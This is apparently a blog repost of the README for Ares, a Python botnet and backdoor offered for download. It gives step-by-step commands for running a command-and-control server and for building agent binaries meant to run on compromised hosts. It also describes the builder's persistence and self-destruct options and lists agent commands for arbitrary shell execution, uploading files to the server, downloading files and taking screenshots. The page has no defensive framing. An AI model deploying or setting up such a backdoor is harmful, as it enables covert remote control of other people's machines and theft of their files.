Home / Unlabelled / Ares - Python Botnet and Backdoor

Ares - Python Botnet and Backdoor

Ares - Python Botnet and Backdoor

Ares is a Python-based remote access tool.

It is made of two main programs:
  • A Command and Control server, which is a Web interface to administer the agents
  • An agent program, which is run on the compromised host, and ensures communication with the CNC
  • The Web interface can be run on any server running Python. The agent can be compiled to native executables using pyinstaller.

Setup

Install the Python requirements:
pip install -r requirements.txt
Initialize the database:
cd server
 ./ares.py initdb
In order to compile Windows agents on Linux, setup wine (optional):
./wine_setup.sh

Server

Run with the builtin (debug) server:
./ares.py runserver -h 0.0.0.0 -p 8080 --threaded
Or run using gunicorn:
gunicorn ares:app -b 0.0.0.0:8080 --threads 20
The server should now be accessible on http://localhost:8080

Agent

Run the Python agent (update config.py to suit your needs):
cd agent
 ./agent.py
Build a new agent to a standalone binary:
./builder.py -p Linux --server http://localhost:8080 -o agent
 ./agent
To see a list of supported options, run ./builder.py -h
./agent/builder.py -h
 usage: builder.py [-h] -p PLATFORM --server SERVER -o OUTPUT
                   [--hello-interval HELLO_INTERVAL] [--idle_time IDLE_TIME]
                   [--max_failed_connections MAX_FAILED_CONNECTIONS]
                   [--persistent]
 
 Builds an Ares agent.
 
 optional arguments:
   -h, --help            show this help message and exit
   -p PLATFORM, --platform PLATFORM
                         Target platform (Windows, Linux).
   --server SERVER       Address of the CnC server (e.g http://localhost:8080).
   -o OUTPUT, --output OUTPUT
                         Output file name.
   --hello-interval HELLO_INTERVAL
                         Delay (in seconds) between each request to the CnC.
   --idle_time IDLE_TIME
                         Inactivity time (in seconds) after which to go idle.
                         In idle mode, the agent pulls commands less often
                         (every <hello_interval> seconds).
   --max_failed_connections MAX_FAILED_CONNECTIONS
                         The agent will self destruct if no contact with the
                         CnC can be made <max_failed_connections> times in a
                         row.
   --persistent          Automatically install the agent on first run.

Supported agent commands:
<any shell command>
 Executes the command in a shell and return its output.
 
 upload <local_file>
 Uploads <local_file> to server.
 
 download <url> <destination>
 Downloads a file through HTTP(S).
 
 zip <archive_name> <folder>
 Creates a zip archive of the folder.
 
 screenshot
 Takes a screenshot.
 
 python <command|file>
 Runs a Python command or local file.
 
 persist
 Installs the agent.
 
 clean
 Uninstalls the agent.
 
 exit
 Kills the agent.
 
 help
 This help.


Download Ares


Source: www.effecthacking.com
Ares - Python Botnet and Backdoor Ares - Python Botnet and Backdoor Reviewed by Anonymous on 2:03 AM Rating: 5

Tags